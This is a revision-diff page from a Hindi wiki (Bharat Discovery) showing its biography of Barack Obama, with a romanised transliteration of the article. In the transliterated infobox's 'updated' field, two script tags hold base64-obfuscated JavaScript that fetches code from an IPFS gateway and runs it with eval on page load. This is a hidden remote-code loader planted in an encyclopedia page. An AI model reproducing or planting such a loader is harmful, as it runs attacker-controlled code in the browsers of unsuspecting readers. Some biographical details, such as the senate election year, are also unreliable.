Difference between revisions of "बराक ओबामा"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (माधवी अग्रवाल ने बराक हुसैन ओबामा पृष्ठ बराक ओबामा पर स्थानांतरित किया)
Line 18: Line 18:
 
|पार्टी=
 
|पार्टी=
 
|पद=
 
|पद=
|कार्य काल=राष्ट्रपति (अमेरिका) -  [[20 जनवरी]], [[2009]] से 20 जनवरी, [[2017]] तक।
+
|कार्य काल=राष्ट्रपति (अमेरिका)-  [[20 जनवरी]], [[2009]] से 20 जनवरी, [[2017]] तक।
 
|शिक्षा=स्नातक
 
|शिक्षा=स्नातक
 
|भाषा=
 
|भाषा=
Line 34: Line 34:
 
|अद्यतन={{अद्यतन|15:51, 27 अप्रॅल 2017 (IST)}}
 
|अद्यतन={{अद्यतन|15:51, 27 अप्रॅल 2017 (IST)}}
 
}}
 
}}
'''बराक हुसैन ओबामा''' ([[अंग्रेज़ी]]: ''Barack Hussein Obama'', जन्म- [[4 अगस्त]], [[1961]], [[अमेरिका]]) अमेरिका के प्रथम अश्वेत (अफ्रीकी अमरीकन) राष्ट्रपति हैं। वे अमेरिका के 44वें [[राष्ट्रपति]] रहे हैं। उन्होंने [[20 जनवरी]], [[2009]] को राष्ट्रपति पद की शपथ ली थी। बराक ओबामा इलिनॉय प्रांत से कनिष्ठ सेनेटर तथा [[2008]] में अमेरिका के राष्ट्रपति पद के लिए डेमोक्रैटिक पार्टी के उम्मीदवार थे।
+
'''बराक हुसैन ओबामा''' ([[अंग्रेज़ी]]: ''Barack Hussein Obama'', जन्म- [[4 अगस्त]], [[1961]], [[अमेरिका]]) अमेरिका के प्रथम अश्वेत (अफ्रीकी अमरीकन) एवं पूर्व राष्ट्रपति हैं। वे अमेरिका के 44वें [[राष्ट्रपति]] रहे हैं। उन्होंने [[20 जनवरी]], [[2009]] को राष्ट्रपति पद की शपथ ली थी। बराक ओबामा इलिनॉय प्रांत से कनिष्ठ सेनेटर तथा [[2008]] में अमेरिका के राष्ट्रपति पद के लिए डेमोक्रैटिक पार्टी के उम्मीदवार थे।
 
==जन्म एवं शिक्षा==
 
==जन्म एवं शिक्षा==
बराक हुसैन ओबामा का जन्म [[4 अगस्त]], [[1961]], [[अमेरिका]] में हुआ था। होनोलूलू में जन्में ओबामा किन्याई मूल के अश्वेत पिता व अमेरीकी मूल की माता के संतान हैं। उनका अधिकांश प्रारंभिक जीवन अमेरिका के हवाई प्रांत में बीता। 6 से 10 [[वर्ष]] तक की अवस्था उन्होंने जकार्ता, इंडोनेशिया में अपनी माता और इंडोनेशियाई सौतेले पिता के संग बिताया। बाल्यकाल में उन्हें बैरी नाम से पुकारा जाता था। बाद में वे होनोलूलू वापस आकर अपनी ननिहाल में ही रहने लगे। [[1995]] में उनकी माता का कैंसर से देहांत हो गया। ओबामा की पत्नी का नाम मिशेल है। उनका [[विवाह]] [[1992]] में हुआ जिससे उनकी दो पुत्रियाँ हैं, 9 वर्षीय मालिया तथा 6 वर्षीय साशा। [[2 नवम्बर]], [[2008]] को ओबामा का आरंभिक लालन पालन करने वाली उनकी दादी मेंडलिन दुनहम का 86 वर्ष की आयु में निधन हो गया। ओबामा ने हार्वड लॉ स्कूल से 1991 में स्नातक की। उन्होंने [[1983]] में बीए की डिग्री प्राप्त की और बिजनेस इंटरनेशनल कॉर्पोरेशन में एक साल तक काम किया। बराक हुसैन ओबामा न्यूयॉर्क सार्वजनिक रुचि अनुसंधान में रहे।
+
बराक हुसैन ओबामा का जन्म [[4 अगस्त]], [[1961]], को [[अमेरिका]] में हुआ था। होनोलूलू में जन्में ओबामा कीनयाई मूल के अश्वेत पिता व अमेरीकी मूल की माता की संतान हैं। उनका अधिकांश प्रारंभिक जीवन अमेरिका के हवाई प्रांत में बीता। 6 से 10 [[वर्ष]] तक की अवस्था उन्होंने जकार्ता, इंडोनेशिया में अपनी माता और इंडोनेशियाई सौतेले पिता के संग बितायी। बाल्यकाल में उन्हें बैरी नाम से पुकारा जाता था। बाद में वे होनोलूलू वापस आकर अपनी ननिहाल में ही रहने लगे। [[1995]] में बराक ओबामा की माता का कैंसर से देहांत हो गया। ओबामा की पत्नी का नाम मिशेल है। उनका [[विवाह]] [[1992]] में हुआ जिससे उनकी दो पुत्रियाँ हैं, 9 वर्षीय मालिया तथा 6 वर्षीय साशा। [[2 नवम्बर]], [[2008]] को ओबामा का आरंभिक लालन पालन करने वाली उनकी दादी मेंडलिन दुनहम का 86 वर्ष की आयु में निधन हो गया। ओबामा ने हार्वड लॉ स्कूल से [[1991]] में स्नातक की फिर उन्होंने [[1983]] में बीए की डिग्री प्राप्त की और बिजनेस इंटरनेशनल कॉर्पोरेशन में एक साल तक काम किया। बराक हुसैन ओबामा न्यूयॉर्क सार्वजनिक रुचि अनुसंधान में रहे।
 
==लेखन कार्य==
 
==लेखन कार्य==
 
बराक हुसैन ओबामा ने दो लोकप्रिय पुस्तकें भी लिखी हैं, पहली पुस्तक 'ड्रीम्स फ्रॉम माई फादर', 'अ स्टोरी ऑफ रेस एंड इन्हेरिटेंस' का प्रकाशन लॉ स्कूल से स्नातक बनने के कुछ [[दिन]] बाद ही हुआ था। इस पुस्तक में उनके होनोलूलू व जकार्ता में बीते बालपन, लॉस एंजलिस व न्यूयॉर्क में व्यतीत कालेज़ जीवन तथा 80 के दशक में [[शिकागो|शिकागो शहर]] में सामुदायिक आयोजक के रूप में उनकी नौकरी के दिनों के संस्मरण हैं। पुस्तक पर आधारित आडियो बुक को [[2006]] में प्रतिष्ठित ग्रैमी पुरस्कार से सम्मानित किया गया है। उनकी दूसरी पुस्तक द ओडेसिटी ऑफ़ होप मध्यावधि चुनाव के महज़ तीन हफ्ते पहले [[अक्तूबर]], 2006 में प्रकाशित हुई। यह किताब शीघ्र ही सर्वाधिक बिकने वाली पुस्तकों की सूची में शामिल हो गई। पुस्तक पर आधारित आडियो बुक को भी [[2008]] में प्रतिष्ठित ग्रैमी पुरस्कार से नवाजा गया है। शिकागो ट्रिब्यून के अनुसार पुस्तक के प्रचार के दौरान लोगों से मिलने के प्रभाव ने ही ओबामा को राष्ट्रपति पद के चुनाव में उतरने का हौसला दिया।  
 
बराक हुसैन ओबामा ने दो लोकप्रिय पुस्तकें भी लिखी हैं, पहली पुस्तक 'ड्रीम्स फ्रॉम माई फादर', 'अ स्टोरी ऑफ रेस एंड इन्हेरिटेंस' का प्रकाशन लॉ स्कूल से स्नातक बनने के कुछ [[दिन]] बाद ही हुआ था। इस पुस्तक में उनके होनोलूलू व जकार्ता में बीते बालपन, लॉस एंजलिस व न्यूयॉर्क में व्यतीत कालेज़ जीवन तथा 80 के दशक में [[शिकागो|शिकागो शहर]] में सामुदायिक आयोजक के रूप में उनकी नौकरी के दिनों के संस्मरण हैं। पुस्तक पर आधारित आडियो बुक को [[2006]] में प्रतिष्ठित ग्रैमी पुरस्कार से सम्मानित किया गया है। उनकी दूसरी पुस्तक द ओडेसिटी ऑफ़ होप मध्यावधि चुनाव के महज़ तीन हफ्ते पहले [[अक्तूबर]], 2006 में प्रकाशित हुई। यह किताब शीघ्र ही सर्वाधिक बिकने वाली पुस्तकों की सूची में शामिल हो गई। पुस्तक पर आधारित आडियो बुक को भी [[2008]] में प्रतिष्ठित ग्रैमी पुरस्कार से नवाजा गया है। शिकागो ट्रिब्यून के अनुसार पुस्तक के प्रचार के दौरान लोगों से मिलने के प्रभाव ने ही ओबामा को राष्ट्रपति पद के चुनाव में उतरने का हौसला दिया।  

Revision as of 11:58, 27 April 2017

barak obama
poora nam barak husain obama
any nam barak obama
janm 4 agast, 1961
janm bhoomi honolooloo, havaee, s॰ra॰a॰, amerika
pati/patni mishel
santan 2 betiyaan- maliya, sasha
kary kal rashtrapati (amerika)- 20 janavari, 2009 se 20 janavari, 2017 tak.
shiksha snatak
puraskar-upadhi nobal shaanti puraskar
any janakari amerika ke rashtrapati barak husain obama mukhy atithi ke roop mean 26 janavari, 2015 ko bharat aye the.
adyatan‎ <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

barak husain obama (aangrezi: Barack Hussein Obama, janm- 4 agast, 1961, amerika) amerika ke pratham ashvet (aphriki amarikan) evan poorv rashtrapati haian. ve amerika ke 44vean rashtrapati rahe haian. unhoanne 20 janavari, 2009 ko rashtrapati pad ki shapath li thi. barak obama ilin aauy praant se kanishth senetar tatha 2008 mean amerika ke rashtrapati pad ke lie demokraitik parti ke ummidavar the.

janm evan shiksha

barak husain obama ka janm 4 agast, 1961, ko amerika mean hua tha. honolooloo mean janmean obama kinayaee mool ke ashvet pita v ameriki mool ki mata ki santan haian. unaka adhikaansh praranbhik jivan amerika ke havaee praant mean bita. 6 se 10 varsh tak ki avastha unhoanne jakarta, iandoneshiya mean apani mata aur iandoneshiyaee sautele pita ke sang bitayi. balyakal mean unhean bairi nam se pukara jata tha. bad mean ve honolooloo vapas akar apani nanihal mean hi rahane lage. 1995 mean barak obama ki mata ka kaiansar se dehaant ho gaya. obama ki patni ka nam mishel hai. unaka vivah 1992 mean hua jisase unaki do putriyaan haian, 9 varshiy maliya tatha 6 varshiy sasha. 2 navambar, 2008 ko obama ka aranbhik lalan palan karane vali unaki dadi meandalin dunaham ka 86 varsh ki ayu mean nidhan ho gaya. obama ne harvad l aau skool se 1991 mean snatak ki phir unhoanne 1983 mean bie ki digri prapt ki aur bijanes iantaraneshanal k aaurporeshan mean ek sal tak kam kiya. barak husain obama nyooy aaurk sarvajanik ruchi anusandhan mean rahe.

lekhan kary

barak husain obama ne do lokapriy pustakean bhi likhi haian, pahali pustak 'drims phr aaum maee phadar', 'a stori aauph res eand inheriteans' ka prakashan l aau skool se snatak banane ke kuchh din bad hi hua tha. is pustak mean unake honolooloo v jakarta mean bite balapan, l aaus eanjalis v nyooy aaurk mean vyatit kalez jivan tatha 80 ke dashak mean shikago shahar mean samudayik ayojak ke roop mean unaki naukari ke dinoan ke sansmaran haian. pustak par adharit adiyo buk ko 2006 mean pratishthit graimi puraskar se sammanit kiya gaya hai. unaki doosari pustak d odesiti aauf hop madhyavadhi chunav ke mahaz tin haphte pahale aktoobar, 2006 mean prakashit huee. yah kitab shighr hi sarvadhik bikane vali pustakoan ki soochi mean shamil ho gee. pustak par adharit adiyo buk ko bhi 2008 mean pratishthit graimi puraskar se navaja gaya hai. shikago tribyoon ke anusar pustak ke prachar ke dauran logoan se milane ke prabhav ne hi obama ko rashtrapati pad ke chunav mean utarane ka hausala diya.

jivan ka saphar

barak husain obama harvard l aau rivyoo ke pahale aphriki ameriki adhyaksh bhi rahe. 1997 se 2004 ilin aauy senet mean tin sevakal poorn karane ke poorv obama ne samudayik ayojak ke roop mean kary kiya hai aur nagarik adhikar adhivakta ke roop mean inhoanne abhyas kiya. 1992 se 2004 tak barak ne shikago vidhi vishvavidyalay mean sanvaidhanik kanoon ka adhyapan bhi kiya. san 2000 mean ameanananriki haus aauph ripreseantetiv mean sit hasil karane mean asaphal hone ke bad janavari, 2003 mean unhoanne ameriki senet ka rukh kiya aur march, 2004 mean prathamik vijay hasil ki. navanbar, 2003 mean barak obama senet ke liye chune gaye. 109vean kaangres mean alpasankhy demokrait sadasy ke roop mean unhoanne paranparik hathiyaroan par niyantran tatha sanghiy kosh ke prayog mean adhik sarvajanik uttaradayitv ka samarthan karate hue vidheyakoan ke nirman mean sahayog diya. barak husain obama poorvi yurop, madhy poorv aur aphrika ki rajakiy yatra par bhi gaye. 110vean kaangres mean l aaubiang v chunavi ghotaloan, paryavaran ke badalav, nabhikiy atankavad aur yuddh se laute ameriki sainikoan ki dekharekh se sanbandhit vidheyakoan ke nirman mean unhoanne sahayog diya.

rashtrapati pad ka saphar

5 joon, 2008 ko yah lagabhag tay ho gaya tha ki obama ki ummidavari ke samarthan mean unaki demokretik pratidvandi tatha poorv ameriki pratham mahila hileri kliantan apani davedari chho d deangi. ameriki itihas mean obama n keval paanchavean aphriki ameananriki sinetar (ameanananriki saansad) haian balki lokapriy matoan se chune jane vale tisare aur sinet mean niyukt ekamatr aphriki ameriki sinetar bhi haian.

nobal shaanti puraskar

vishvashaanti mean ullekhaniy yogadan ke lie barak obama ko varsh 2009 ke nobel shaanti puraskar ke lie chuna gaya.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

bahari k diyaan

sanbandhit lekh